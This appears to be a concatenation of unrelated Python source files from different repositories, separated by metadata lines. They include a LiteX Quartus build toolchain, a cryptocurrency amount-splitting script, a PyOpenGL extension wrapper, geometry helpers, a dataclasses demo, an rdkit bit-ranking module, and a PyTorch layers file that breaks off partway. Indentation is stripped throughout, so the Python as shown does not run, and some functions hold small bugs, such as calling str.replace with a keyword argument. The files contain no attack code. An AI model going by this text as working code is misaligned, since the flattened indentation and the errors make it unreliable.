# Copyright (c) 2014-2019 <NAME> <<EMAIL>>
# Copyright (c) 2019 msloniewski <<EMAIL>>
# Copyright (c) 2019 vytautasb <<EMAIL>>
# SPDX-License-Identifier: BSD-2-Clause
import os
import subprocess
import sys
import math
from shutil import which
from migen.fhdl.structure import _Fragment
from litex.build.generic_platform import Pins, IOStandard, Misc
from litex.build import tools
# IO/Placement Constraints (.qsf) ------------------------------------------------------------------
def _format_constraint(c, signame, fmt_r):
# IO location constraints
if isinstance(c, Pins):
tpl = "set_location_assignment -comment \"{name}\" -to {signame} Pin_{pin}"
return tpl.format(signame=signame, name=fmt_r, pin=c.identifiers[0])
# IO standard constraints
elif isinstance(c, IOStandard):
tpl = "set_instance_assignment -name io_standard -comment \"{name}\" \"{std}\" -to {signame}"
return tpl.format(signame=signame, name=fmt_r, std=c.name)
# Others constraints
elif isinstance(c, Misc):
if not isinstance(c.misc, str) and len(c.misc) == 2:
tpl = "set_instance_assignment -comment \"{name}\" -name {misc[0]} \"{misc[1]}\" -to {signame}"
return tpl.format(signame=signame, name=fmt_r, misc=c.misc)
else:
tpl = "set_instance_assignment -comment \"{name}\" -name {misc} -to {signame}"
return tpl.format(signame=signame, name=fmt_r, misc=c.misc)
def _format_qsf_constraint(signame, pin, others, resname):
fmt_r = "{}:{}".format(*resname[:2])
if resname[2] is not None:
fmt_r += "." + resname[2]
fmt_c = [_format_constraint(c, signame, fmt_r) for c in ([Pins(pin)] + others)]
return '\n'.join(fmt_c)
def _build_qsf_constraints(named_sc, named_pc):
qsf = []
for sig, pins, others, resname in named_sc:
if len(pins) > 1:
for i, p in enumerate(pins):
qsf.append(_format_qsf_constraint("{}[{}]".format(sig, i), p, others, resname))
else:
qsf.append(_format_qsf_constraint(sig, pins[0], others, resname))
if named_pc:
qsf.append("\n\n".join(named_pc))
return "\n".join(qsf)
# Timing Constraints (.sdc) ------------------------------------------------------------------------
def _build_sdc(clocks, false_paths, vns, named_sc, build_name, additional_sdc_commands):
sdc = []
# Clock constraints
for clk, period in sorted(clocks.items(), key=lambda x: x[0].duid):
is_port = False
for sig, pins, others, resname in named_sc:
if sig == vns.get_name(clk):
is_port = True
if is_port:
tpl = "create_clock -name {clk} -period {period} [get_ports {{{clk}}}]"
sdc.append(tpl.format(clk=vns.get_name(clk), period=str(period)))
else:
tpl = "create_clock -name {clk} -period {period} [get_nets {{{clk}}}]"
sdc.append(tpl.format(clk=vns.get_name(clk), period=str(period)))
# False path constraints
for from_, to in sorted(false_paths, key=lambda x: (x[0].duid, x[1].duid)):
tpl = "set_false_path -from [get_clocks {{{from_}}}] -to [get_clocks {{{to}}}]"
sdc.append(tpl.format(from_=vns.get_name(from_), to=vns.get_name(to)))
# Add additional commands
sdc += additional_sdc_commands
# Generate .sdc
tools.write_to_file("{}.sdc".format(build_name), "\n".join(sdc))
# Project (.qsf) -----------------------------------------------------------------------------------
def _build_qsf(device, ips, sources, vincpaths, named_sc, named_pc, build_name, additional_qsf_commands):
qsf = []
# Set device
qsf.append("set_global_assignment -name DEVICE {}".format(device))
# Add sources
for filename, language, library in sources:
if language == "verilog": language = "systemverilog" # Enforce use of SystemVerilog
tpl = "set_global_assignment -name {lang}_FILE {path} -library {lib}"
# Do not add None type files
if language is not None:
qsf.append(tpl.format(lang=language.upper(), path=filename.replace("\\", "/"), lib=library))
# Check if the file is a header. Those should not be explicitly added to qsf,
# but rather included in include search_path
else:
if filename.endswith(".svh") or filename.endswith(".vh"):
fpath = os.path.dirname(filename)
if fpath not in vincpaths:
vincpaths.append(fpath)
# Add ips
for filename in ips:
tpl = "set_global_assignment -name QSYS_FILE {filename}"
qsf.append(tpl.replace(filename=filename.replace("\\", "/")))
# Add include paths
for path in vincpaths:
qsf.append("set_global_assignment -name SEARCH_PATH {}".format(path.replace("\\", "/")))
# Set top level
qsf.append("set_global_assignment -name top_level_entity " + build_name)
# Add io, placement constraints
qsf.append(_build_qsf_constraints(named_sc, named_pc))
# Set timing constraints
qsf.append("set_global_assignment -name SDC_FILE {}.sdc".format(build_name))
# Add additional commands
qsf += additional_qsf_commands
# Generate .qsf
tools.write_to_file("{}.qsf".format(build_name), "\n".join(qsf))
# Script -------------------------------------------------------------------------------------------
def _build_script(build_name, create_rbf):
if sys.platform in ["win32", "cygwin"]:
script_contents = "REM Autogenerated by LiteX / git: " + tools.get_litex_git_revision()
script_file = "build_" + build_name + ".bat"
else:
script_contents = "# Autogenerated by LiteX / git: " + tools.get_litex_git_revision()
script_file = "build_" + build_name + ".sh"
script_contents += """
quartus_map --read_settings_files=on --write_settings_files=off {build_name} -c {build_name}
quartus_fit --read_settings_files=off --write_settings_files=off {build_name} -c {build_name}
quartus_asm --read_settings_files=off --write_settings_files=off {build_name} -c {build_name}
quartus_sta {build_name} -c {build_name}"""
if create_rbf:
script_contents += """
if [ -f "{build_name}.sof" ]
then
quartus_cpf -c {build_name}.sof {build_name}.rbf
fi
"""
script_contents = script_contents.format(build_name=build_name)
tools.write_to_file(script_file, script_contents, force_unix=True)
return script_file
def _run_script(script):
if sys.platform in ["win32", "cygwin"]:
shell = ["cmd", "/c"]
else:
shell = ["bash"]
if which("quartus_map") is None:
msg = "Unable to find Quartus toolchain, please:\n"
msg += "- Add Quartus toolchain to your $PATH."
raise OSError(msg)
if subprocess.call(shell + [script]) != 0:
raise OSError("Error occured during Quartus's script execution.")
# AlteraQuartusToolchain ---------------------------------------------------------------------------
class AlteraQuartusToolchain:
attr_translate = {}
def __init__(self):
self.clocks = dict()
self.false_paths = set()
self.additional_sdc_commands = []
self.additional_qsf_commands = []
def build(self, platform, fragment,
build_dir = "build",
build_name = "top",
run = True,
**kwargs):
# Create build directory
cwd = os.getcwd()
os.makedirs(build_dir, exist_ok=True)
os.chdir(build_dir)
# Finalize design
if not isinstance(fragment, _Fragment):
fragment = fragment.get_fragment()
platform.finalize(fragment)
# Generate verilog
v_output = platform.get_verilog(fragment, name=build_name, **kwargs)
named_sc, named_pc = platform.resolve_signals(v_output.ns)
v_file = build_name + ".v"
v_output.write(v_file)
platform.add_source(v_file)
# Generate design timing constraints file (.sdc)
_build_sdc(
clocks = self.clocks,
false_paths = self.false_paths,
vns = v_output.ns,
named_sc = named_sc,
build_name = build_name,
additional_sdc_commands = self.additional_sdc_commands)
# Generate design project and location constraints file (.qsf)
_build_qsf(
device = platform.device,
ips = platform.ips,
sources = platform.sources,
vincpaths = platform.verilog_include_paths,
named_sc = named_sc,
named_pc = named_pc,
build_name = build_name,
additional_qsf_commands = self.additional_qsf_commands)
# Generate build script
script = _build_script(build_name, platform.create_rbf)
# Run
if run:
_run_script(script)
os.chdir(cwd)
return v_output.ns
def add_period_constraint(self, platform, clk, period):
clk.attr.add("keep")
period = math.floor(period*1e3)/1e3 # round to lowest picosecond
if clk in self.clocks:
if period != self.clocks[clk]:
raise ValueError("Clock already constrained to {:.2f}ns, new constraint to {:.2f}ns"
.format(self.clocks[clk], period))
self.clocks[clk] = period
def add_false_path_constraint(self, platform, from_, to):
from_.attr.add("keep")
to.attr.add("keep")
if (to, from_) not in self.false_paths:
self.false_paths.add((from_, to))
|
Knapsack.py | byterubpay/mininero1 | 182 | 9688 | <reponame>byterubpay/mininero1
import Crypto.Random.random as rand
import itertools
import math #for log
import sys
def decomposition(i):
#from stack exchange, don't think it's uniform
while i > 0:
n = rand.randint(1, i)
yield n
i -= n
def Decomposition(i):
while True:
l = list(decomposition(i))
if len(set(l)) == len(l):
return l
def decomposition2(n, s, d, k):
#home-brewed, returns no duplicates, includes the number d
s = s - 1
n = n
while True:
a = [d]
nn = n
#a.append(d)
for i in range(0, s):
a.append(rand.randint(0, n))
a.sort()
#print("a", a)
b = []
c = []
while len(a) > 0:
t = a.pop()
#print(t, a)
if t >= d:
b.append(nn - t)
else:
c.append(nn - t)
nn = t
c.append(nn)
tot = b[:] + c[:]
#print("b", b)
if sum(set(tot)) == n and len(c) > int(k):
return sorted(c), sorted(b)
def decomposition3(n, s, d, k):
#a combination of both methods, designed to get some smaller values
send, change = decomposition2(n, s, d, k)
for i in send:
if i > n / s:
send.remove(i)
send = send + list(Decomposition(i))
for i in change:
if i > n / (s - 1):
change.remove(i)
change = change + list(Decomposition(i))
return send, change
def divv(l, m):
return [a /float( m) for a in l]
def frexp10(x):
exp = int(math.log10(x))
return x / 10**exp, exp
def decideAmounts(totalInputs, toSend, Partitions, k, fuzz):
#fuzz is an optional amount to fuzz the transaction by
#so if you start with a big obvious number like 2000, it might be fuzzed by up to "fuzz" amount
fz = rand.randint(0, int(fuzz * 1000) ) / 1000.0
toSend += fz
g, ii =frexp10(totalInputs)
ii = 10 ** (-1 * min(ii - 2, 0))
print("ii", ii)
M = 10 ** (int(math.log(2 ** Partitions) / math.log(10))) * ii
#M = 10 ** M
print("multiplier:", M)
totalInputs = int(totalInputs * M)
toSend = int(toSend * M)
change = totalInputs - toSend
send_amounts, change_amounts = decomposition3(totalInputs, Partitions, toSend, k)
all_amounts = send_amounts[:] + change_amounts[:]
rand.shuffle(all_amounts)
print("")
print("change amounts:", divv(change_amounts, M))
print("send amounts:", divv(send_amounts, M))
print("now from the following, how much is sent?")
print("all amounts:", sorted(divv(all_amounts, M)))
print("possible sent amounts:")
amounts = []
for L in range(0, len(all_amounts)+1):
for subset in itertools.combinations(all_amounts, L):
amounts.append(sum(subset))
print("number of possible sent amounts:")
print(len(amounts))
print("2^N:", 2 ** len(all_amounts))
print("number of possible sent amounts duplicates removed:")
print(len(list(set(amounts))))
if len(sys.argv) > 2:
kk = 2
parts = 7
kk = rand.randint(1, int(parts / 4)) #how many sends to demand
fuzz = 1
decideAmounts(float(sys.argv[1]), float(sys.argv[2]), parts, kk, fuzz)
|
deep-rl/lib/python2.7/site-packages/OpenGL/GL/ARB/transform_feedback_instanced.py | ShujaKhalid/deep-rl | 210 | 9764 | <filename>deep-rl/lib/python2.7/site-packages/OpenGL/GL/ARB/transform_feedback_instanced.py<gh_stars>100-1000
'''OpenGL extension ARB.transform_feedback_instanced
This module customises the behaviour of the
OpenGL.raw.GL.ARB.transform_feedback_instanced to provide a more
Python-friendly API
Overview (from the spec)
Multiple instances of geometry may be specified to the GL by calling
functions such as DrawArraysInstanced and DrawElementsInstanced. Further,
the results of a transform feedback operation may be returned to the GL
by calling DrawTransformFeedback, or DrawTransformFeedbackStream. However,
it is not presently possible to draw multiple instances of data
transform feedback without using a query and the resulting round trip from
server to client.
This extension adds functionality to draw multiple instances of the result
of a transform feedback operation.
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/ARB/transform_feedback_instanced.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.ARB.transform_feedback_instanced import *
from OpenGL.raw.GL.ARB.transform_feedback_instanced import _EXTENSION_NAME
def glInitTransformFeedbackInstancedARB():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION |
ahrs/common/geometry.py | jaluebbe/ahrs | 184 | 9788 | <filename>ahrs/common/geometry.py
# -*- coding: utf-8 -*-
"""
Geometrical functions
---------------------
References
----------
.. [W1] Wikipedia: https://de.wikipedia.org/wiki/Ellipse#Ellipsengleichung_(Parameterform)
.. [WAE] Wolfram Alpha: Ellipse. (http://mathworld.wolfram.com/Ellipse.html)
"""
import numpy as np
from typing import Union
def circle(center: Union[list, np.ndarray], radius: float = 1.0, num_points: int = 20) -> np.ndarray:
"""
Build a circle with the given characteristics.
Parameters
----------
c : array-like
2D Coordinates of center.
r : float
Radius of the circle.
num_points : int
Number of points to build.
Returns
-------
points : numpy.ndarray
N-by-2 array with the coordinates of the circle.
"""
R = np.linspace(0.0, 2.0*np.pi, num_points+1)
x = center[0] + radius*np.cos(R)
y = center[1] + radius*np.sin(R)
return np.array([x, y]).transpose()
def ellipse(center: Union[list, np.ndarray], phi: float, axes: Union[list, np.ndarray], num_points: int = 20) -> np.ndarray:
"""
Build an ellipse with the given characteristics.
Parameters
----------
center : array-like
2D Coordinates of center.
phi : float
Angle, in radians, of the major axis w.r.t. the X-axis
axes : array-like
Lengths of major and minor axes, respectively.
num_points : int
Number of points. Defaults to 20.
Returns
-------
points : numpy.ndarray
N-by-2 array with the coordinates of the ellipse.
"""
R = np.linspace(0.0, 2.0*np.pi, num_points+1)
a, b = axes
x = center[0] + a*np.cos(R)*np.cos(phi) - b*np.sin(R)*np.sin(phi)
y = center[1] + a*np.cos(R)*np.sin(phi) + b*np.sin(R)*np.cos(phi)
return np.array([x, y]).transpose()
|
dataclassses_howto.py | CvanderStoep/VideosSampleCode | 285 | 9811 | <gh_stars>100-1000
import dataclasses
import inspect
from dataclasses import dataclass, field
from pprint import pprint
import attr
class ManualComment:
def __init__(self, id: int, text: str):
self.id: int = id
self.text: str = text
def __repr__(self):
return "{}(id={}, text={})".format(self.__class__.__name__, self.id, self.text)
def __eq__(self, other):
if other.__class__ is self.__class__:
return (self.id, self.text) == (other.id, other.text)
else:
return NotImplemented
def __ne__(self, other):
result = self.__eq__(other)
if result is NotImplemented:
return NotImplemented
else:
return not result
def __hash__(self):
return hash((self.__class__, self.id, self.text))
def __lt__(self, other):
if other.__class__ is self.__class__:
return (self.id, self.text) < (other.id, other.text)
else:
return NotImplemented
def __le__(self, other):
if other.__class__ is self.__class__:
return (self.id, self.text) <= (other.id, other.text)
else:
return NotImplemented
def __gt__(self, other):
if other.__class__ is self.__class__:
return (self.id, self.text) > (other.id, other.text)
else:
return NotImplemented
def __ge__(self, other):
if other.__class__ is self.__class__:
return (self.id, self.text) >= (other.id, other.text)
else:
return NotImplemented
@dataclass(frozen=True, order=True)
class Comment:
id: int
text: str = ""
replies: list[int] = field(default_factory=list, repr=False, compare=False)
@attr.s(frozen=True, order=True, slots=True)
class AttrComment:
id: int = 0
text: str = ""
def main():
comment = Comment(1, "I just subscribed!")
# comment.id = 3 # can't immutable
print(comment)
print(dataclasses.astuple(comment))
print(dataclasses.asdict(comment))
copy = dataclasses.replace(comment, id=3)
print(copy)
pprint(inspect.getmembers(Comment, inspect.isfunction))
if __name__ == '__main__':
main()
|
rdkit/ML/InfoTheory/BitRank.py | kazuyaujihara/rdkit | 1,609 | 9818 | <filename>rdkit/ML/InfoTheory/BitRank.py
#
# Copyright (C) 2001,2002,2003 <NAME> and Rational Discovery LLC
#
""" Functionality for ranking bits using info gains
**Definitions used in this module**
- *sequence*: an object capable of containing other objects which supports
__getitem__() and __len__(). Examples of these include lists, tuples, and
Numeric arrays.
- *IntVector*: an object containing integers which supports __getitem__() and
__len__(). Examples include lists, tuples, Numeric Arrays, and BitVects.
**NOTE**: Neither *sequences* nor *IntVectors* need to support item assignment.
It is perfectly acceptable for them to be read-only, so long as they are
random-access.
"""
import numpy
from rdkit.ML.InfoTheory import entropy
def FormCounts(bitVects, actVals, whichBit, nPossibleActs, nPossibleBitVals=2):
""" generates the counts matrix for a particular bit
**Arguments**
- bitVects: a *sequence* containing *IntVectors*
- actVals: a *sequence*
- whichBit: an integer, the bit number to use.
- nPossibleActs: the (integer) number of possible activity values.
- nPossibleBitVals: (optional) if specified, this integer provides the maximum
value attainable by the (increasingly inaccurately named) bits in _bitVects_.
**Returns**
a Numeric array with the counts
**Notes**
This is really intended for internal use.
"""
if len(bitVects) != len(actVals):
raise ValueError('var and activity lists should be the same length')
res = numpy.zeros((nPossibleBitVals, nPossibleActs), numpy.integer)
for i in range(len(bitVects)):
res[bitVects[i][whichBit], actVals[i]] += 1
return res
def CalcInfoGains(bitVects, actVals, nPossibleActs, nPossibleBitVals=2):
""" Calculates the information gain for a set of points and activity values
**Arguments**
- bitVects: a *sequence* containing *IntVectors*
- actVals: a *sequence*
- nPossibleActs: the (integer) number of possible activity values.
- nPossibleBitVals: (optional) if specified, this integer provides the maximum
value attainable by the (increasingly inaccurately named) bits in _bitVects_.
**Returns**
a list of floats
"""
if len(bitVects) != len(actVals):
raise ValueError('var and activity lists should be the same length')
nBits = len(bitVects[0])
res = numpy.zeros(nBits, numpy.float)
for bit in range(nBits):
counts = FormCounts(bitVects, actVals, bit, nPossibleActs, nPossibleBitVals=nPossibleBitVals)
res[bit] = entropy.InfoGain(counts)
return res
def RankBits(bitVects, actVals, nPossibleBitVals=2, metricFunc=CalcInfoGains):
""" Rank a set of bits according to a metric function
**Arguments**
- bitVects: a *sequence* containing *IntVectors*
- actVals: a *sequence*
- nPossibleBitVals: (optional) if specified, this integer provides the maximum
value attainable by the (increasingly inaccurately named) bits in _bitVects_.
- metricFunc: (optional) the metric function to be used. See _CalcInfoGains()_
for a description of the signature of this function.
**Returns**
A 2-tuple containing:
- the relative order of the bits (a list of ints)
- the metric calculated for each bit (a list of floats)
"""
nPossibleActs = max(actVals) + 1
metrics = metricFunc(bitVects, actVals, nPossibleActs, nPossibleBitVals=nPossibleBitVals)
bitOrder = list(numpy.argsort(metrics))
bitOrder.reverse()
return bitOrder, metrics
def AnalyzeSparseVects(bitVects, actVals):
""" #DOC
**Arguments**
- bitVects: a *sequence* containing SBVs
- actVals: a *sequence*
**Returns**
a list of floats
**Notes**
- these need to be bit vects and binary activities
"""
nPts = len(bitVects)
if nPts != len(actVals):
raise ValueError('var and activity lists should be the same length')
nBits = bitVects[0].GetSize()
actives = numpy.zeros(nBits, numpy.integer)
inactives = numpy.zeros(nBits, numpy.integer)
nActives, nInactives = 0, 0
for i in range(nPts):
sig, act = bitVects[i], actVals[i]
onBitList = sig.GetOnBits()
if act:
for bit in onBitList:
actives[bit] += 1
nActives += 1
else:
for bit in onBitList:
inactives[bit] += 1
nInactives += 1
resTbl = numpy.zeros((2, 2), numpy.integer)
res = []
gains = []
for bit in range(nBits):
nAct, nInact = actives[bit], inactives[bit]
if nAct or nInact:
resTbl[0, 0] = nAct
resTbl[1, 0] = nPts - nAct
resTbl[0, 1] = nInact
resTbl[1, 1] = nPts - nInact
gain = entropy.InfoGain(resTbl)
gains.append(gain)
res.append((bit, gain, nAct, nInact))
return res, gains
def SparseRankBits(bitVects, actVals, metricFunc=AnalyzeSparseVects):
""" Rank a set of bits according to a metric function
**Arguments**
- bitVects: a *sequence* containing SBVs
- actVals: a *sequence*
- metricFunc: (optional) the metric function to be used. See _SparseCalcInfoGains()_
for a description of the signature of this function.
**Returns**
A 2-tuple containing:
- the relative order of the bits (a list of ints)
- the metric calculated for each bit (a list of floats)
**Notes**
- these need to be bit vects and binary activities
"""
info, metrics = metricFunc(bitVects, actVals)
bitOrder = list(numpy.argsort(metrics))
bitOrder.reverse()
return bitOrder, info
|
layers/eight_mile/pytorch/layers.py | dpressel/baseline | 241 | 9820 | <gh_stars>100-1000
import copy
import math
import logging
from typing import Dict, List, Optional, Tuple, Union
import os
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.jit as jit
import torch.autograd
import contextlib
import glob
from eight_mile.utils import listify, Offsets, is_sequence, str2bool, get_alibi_slopes
from eight_mile.utils import transition_mask as transition_mask_np
MASK_FALSE = False
logger = logging.getLogger("mead.layers")
def sequence_mask(lengths: torch.Tensor, max_len: int = -1) -> torch.Tensor:
"""Generate a sequence mask of shape `BxT` based on the given lengths
:param lengths: A `B` tensor containing the lengths of each example
:param max_len: The maximum width (length) allowed in this mask (default to None)
:return: A mask
"""
lens = lengths.cpu()
if max_len < 0:
max_len_v = torch.max(lens)
else:
max_len_v = max_len
# 1 x T
row = torch.arange(0, max_len_v).type_as(lens).view(1, -1)
# B x 1
col = lens.view(-1, 1)
# Broadcast to B x T, compares increasing number to max
mask = row < col
return mask
def sequence_mask_mxlen(lengths: torch.Tensor, max_len: int) -> torch.Tensor:
"""Generate a sequence mask of shape `BxT` based on the given lengths, with a maximum value
This function primarily exists to make ONNX tracing work better
:param lengths: A `B` tensor containing the lengths of each example
:param max_len: The maximum width (length) allowed in this mask (default to None)
:return: A mask
"""
lens = lengths.cpu()
max_len_v = max_len
# 1 x T
row = torch.arange(0, max_len_v).type_as(lens).view(1, -1)
# B x 1
col = lens.view(-1, 1)
# Broadcast to B x T, compares increasing number to max
mask = row < col
return mask
@torch.jit.script
def truncate_mask_over_time(mask: torch.Tensor, x: torch.Tensor) -> torch.Tensor:
Tout = x.shape[1]
mask = mask[:, :Tout]
#mask = mask.narrow(1, 0, arcs_h.shape[1])
return mask
def vec_log_sum_exp(vec: torch.Tensor, dim: int) -> torch.Tensor:
"""Vectorized version of log-sum-exp
:param vec: Vector
:param dim: What dimension to operate on
:return:
"""
max_scores, idx = torch.max(vec, dim, keepdim=True)
max_scores_broadcast = max_scores.expand_as(vec)
return max_scores + torch.log(torch.sum(torch.exp(vec - max_scores_broadcast), dim, keepdim=True))
def unsort_batch(batch: torch.Tensor, perm_idx: torch.Tensor) -> torch.Tensor:
"""Undo the sort on a batch of tensors done for packing the data in the RNN.
:param batch: The batch of data batch first `[B, ...]`
:param perm_idx: The permutation index returned from the torch.sort.
:returns: The batch in the original order.
"""
# Add ones to the shape of the perm_idx until it can broadcast to the batch
perm_idx = perm_idx.to(batch.device)
diff = len(batch.shape) - len(perm_idx.shape)
extra_dims = [1] * diff
perm_idx = perm_idx.view([-1] + extra_dims)
return torch.scatter(torch.zeros_like(batch), 0, perm_idx.expand_as(batch), batch)
def infer_lengths(tensor, dim=1):
"""Infer the lengths of an input based on the idea the Offsets.PAD was used as the padding token.
:param tensor: The data to infer the length of, should be either [B, T] or [T, B]
:param dim: The dimension which contains the sequential signal
:returns: A Tensor of shape `[B]` that has the lengths for example item in the batch
"""
if len(tensor.shape) != 2:
raise ValueError(f"infer_lengths only works with tensors wit two dims right now, got {len(tensor.shape)}")
offsets = torch.arange(1, tensor.shape[dim] + 1, device=tensor.device, dtype=tensor.dtype).unsqueeze(1 - dim)
non_pad_loc = (tensor != Offsets.PAD).to(tensor.dtype)
return torch.argmax(non_pad_loc * offsets, dim=dim) + 1
def tensor_and_lengths(inputs) -> Tuple[torch.Tensor, Optional[torch.Tensor]]:
"""Return either the unpacked inputs (2), or a `Tuple` of the input with None
TODO: this function should probably be changed to always return the lengths second.
To do this, we just need a sentinel value, e.g. <PAD> (0). The problem with doing this is
that it might be possible to generate <PAD> in the middle of the tensor which would make that
length invalid.
:param inputs: Either a sequence of the `(tensor, length)` or just the `tensor`
:return: A `Tuple` of `(tensor, length)` or `(tensor, None)`
"""
if isinstance(inputs, (list, tuple)):
in_tensor, lengths = inputs
else:
in_tensor = inputs
lengths = None
return in_tensor, lengths
class VariationalDropout(nn.Module):
"""Inverted dropout that applies the same mask at each time step."""
def __init__(self, pdrop: float = 0.5, batch_first: bool = False):
"""Variational Dropout
:param pdrop: the percentage to drop
"""
super().__init__()
self.pdrop = pdrop
self.batch_first = batch_first
def extra_repr(self):
return "p=%.1f" % self.pdrop
def forward(self, input: torch.Tensor) -> torch.Tensor:
if not self.training:
return input
# Create a mask that covers a single time step
if self.batch_first:
dim0 = input.size(0)
dim1 = 1
else:
dim0 = 1
dim1 = input.size(1)
mask = torch.zeros(dim0, dim1, input.size(2)).bernoulli_(1 - self.pdrop).to(input.device)
mask = mask / self.pdrop
# Broadcast the mask over the sequence
return mask * input
class SequenceLoss(nn.Module):
"""Computes the loss over a sequence"""
def __init__(self, LossFn: nn.Module = nn.NLLLoss, avg: str = "token"):
"""A class that applies a Loss function to sequence via the folding trick.
:param LossFn: A loss function to apply (defaults to `nn.NLLLoss`)
:param avg: A divisor to apply, valid values are `token` and `batch`
"""
super().__init__()
self.avg = avg
if avg == "token":
self.crit = LossFn(ignore_index=Offsets.PAD, reduction="mean")
self._norm = self._no_norm
else:
self.crit = LossFn(ignore_index=Offsets.PAD, reduction="sum")
self._norm = self._batch_norm
def _batch_norm(self, loss, inputs):
return loss / inputs.size()[0]
def _no_norm(self, loss, inputs):
return loss
def forward(self, inputs: torch.Tensor, targets: torch.Tensor) -> torch.Tensor:
"""Evaluate some loss over a sequence.
:param inputs: torch.FloatTensor, [B, .., C] The scores from the model. Batch First
:param targets: torch.LongTensor, The labels.
:returns: torch.FloatTensor, The loss.
"""
total_sz = targets.nelement()
loss = self.crit(inputs.view(total_sz, -1), targets.view(total_sz))
return self._norm(loss, inputs)
def extra_repr(self):
return f"reduction={self.avg}"
class LabelSmoothingLoss(nn.Module):
def __init__(self, label_smoothing, ignore_index=0, reduction="none"):
"""Use Label smoothing from `Szegedy et. al., 2015`_ to temper model confidence.
Implements add-gamma smoothing where the probability mass of the gold label distribution
is smoothed across classes.
This implementation is based on `OpenNMT-py`_ but has been adapted to not require the
vocabulary size up front.
.. _Szegedy et. al., 2015: https://arxiv.org/abs/1512.00567
.. _OpenNMY-py: https://github.com/OpenNMT/OpenNMT-py/blob/938a4f561b07f4d468647823fab761cfb51f21da/onmt/utils/loss.py#L194
"""
if not (0.0 < label_smoothing <= 1.0):
raise ValueError(f"`label_smoothing` must be between 0.0 and 1.0, got {label_smoothing}")
super().__init__()
self.ignore_index = ignore_index
self.label_smoothing = label_smoothing
self.confidence = 1.0 - label_smoothing
self.reduction = reduction if reduction != "mean" else "batchmean"
def forward(self, output: torch.Tensor, target: torch.Tensor) -> torch.Tensor:
"""
:param output: The model outputs, [B, V]
:param target: The target labels, [B]
"""
B, V = output.size()
smoothed = torch.full((B, V), self.label_smoothing / (V - 2))
smoothed[:, self.ignore_index] = 0
smoothed = torch.scatter(smoothed, 1, target.unsqueeze(1), self.confidence)
smoothed = smoothed.masked_fill_((target == self.ignore_index).unsqueeze(1), 0)
return F.kl_div(output, smoothed, reduction=self.reduction)
def extra_repr(self):
return f"label_smoothing={self.label_smoothing}"
class MeanPool1D(nn.Module):
"""Do a mean pool while accounting for the length of a sequence
"""
def __init__(self, outsz, batch_first=True):
"""Set up pooling module
:param outsz: The output dim, for dowstream access
:param batch_first: Is this module batch first or time first?
"""
super().__init__()
self.batch_first = batch_first
self.reduction_dim = 1 if self.batch_first else 0
self.output_dim = outsz
self.requires_length = True
def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> torch.Tensor:
"""Apply mean pooling on the valid inputs
:param inputs: A tuple of `(input, lengths)`
:return: Pooled output
"""
tensor, lengths = tensor_and_lengths(inputs)
# Regardless of whether the input is `[B, T, H]` or `[T, B, H]` the shape after
# the sum is `[B, H]` so the lengths (of shape `[B]`) should be unsqueezed to
# `[B, 1]` in order to broadcast
return torch.sum(tensor, self.reduction_dim, keepdim=False) / torch.unsqueeze(lengths, -1).to(tensor.dtype).to(
tensor.device
)
def extra_repr(self):
return f"batch_first={self.batch_first}"
class MaxPool1D(nn.Module):
"""Do a max-pooling operation with or without a length given
"""
def __init__(self, outsz, batch_first=True):
super().__init__()
self.batch_first = batch_first
self.reduction_dim = 1 if self.batch_first else 0
self.output_dim = outsz
def forward(self, inputs: Union[torch.Tensor, Tuple[torch.Tensor, torch.Tensor]]) -> torch.Tensor:
"""If we are given a tuple as input, we will use the length, otherwise we will do an operation without masking
:param inputs: either a tuple of `(input, lengths)` or a tensor `input`
:return: A pooled tensor
"""
tensor, lengths = tensor_and_lengths(inputs)
if lengths is not None:
# If tensor = `[B, T, H]`
# mask = `[B, T, 1]`
# If tensor = `[T, B, H]`
# mask = `[T, B, 1]`
# So it will mask all the values in H past the right length
mask = sequence_mask(lengths).to(tensor.device)
mask = mask if self.batch_first else bth2tbh(mask)
# Fill masked with very negative so it never gets selected
tensor = tensor.masked_fill(mask.unsqueeze(-1) == MASK_FALSE, -1e4)
dmax, _ = torch.max(tensor, self.reduction_dim, keepdim=False)
return dmax
def extra_repr(self) -> str:
return f"batch_first={self.batch_first}"
# Torch only added this module in 1.4.0, shim
class GeLU(nn.Module):
def __init__(self):
super().__init__()
def forward(self, x):
return torch.nn.functional.gelu(x)
#Code taken from: https://github.com/huggingface/transformers/blob/766d4bf7920213bdd8a8afb42a72719190124568/src/transformers/activations.py#L27
class Gpt2GELU(nn.Module):
"""
Implementation of the GELU activation function currently in Google BERT repo (identical to OpenAI GPT). Also see
the Gaussian Error Linear Units paper: https://arxiv.org/abs/1606.08415
"""
def forward(self, input):
return 0.5 * input * (1.0 + torch.tanh(math.sqrt(2.0 / math.pi) * (input + 0.044715 * torch.pow(input, 3.0))))
def get_activation(name: str = "relu") -> nn.Module:
"""Get back an `nn.Module` by string name of the activation operator
:param name: A string name of the operation
:return: A module associated with that string
"""
if name is None or name == "ident":
return nn.Identity()
if name == "tanh":
return nn.Tanh()
if name == "gelu":
return GeLU()
if name == "hardtanh":
return nn.Hardtanh()
if name == "leaky_relu":
return nn.LeakyReLU()
if name == "prelu":
return nn.PReLU()
if name == "sigmoid":
return nn.Sigmoid()
if name == "log_sigmoid":
return nn.LogSigmoid()
if name == "log_softmax":
return nn.LogSoftmax(dim=-1)
if name == "softmax":
return nn.Softmax(dim=-1)
if name == "gpt2_gelu":
return Gpt2GELU()
return nn.ReLU()
def _cat_dir(h: torch.Tensor) -> torch.Tensor:
"""Concat forward and backword state vectors.
The shape of the hidden is `[#layers * #dirs, B, H]`. The docs say you can
separate directions with `h.view(#l, #dirs, B, H)` with the forward dir being
index 0 and backwards dir being 1.
This means that before separating with the view the forward dir are the even
indices in the first dim while the backwards dirs are the odd ones. Here we select
the even and odd values and concatenate them
:param h: The hidden shape as it comes back from PyTorch modules
"""
return torch.cat([h[0 : h.size(0) : 2], h[1 : h.size(0) : 2]], dim=-1)
def concat_state_dirs(state):
"""Convert the bidirectional out of an RNN so the forward and backward values are a single vector."""
if isinstance(state, tuple):
return tuple(_cat_dir(h) for h in state)
return _cat_dir(state)
class Conv1DSame(nn.Module):
"""Perform a 1D convolution with output size same as input size
To make this operation work as expected, we cannot just use `padding=kernel_size//2` inside
of the convolution operation. Instead, we zeropad the input using the `ConstantPad1d` module
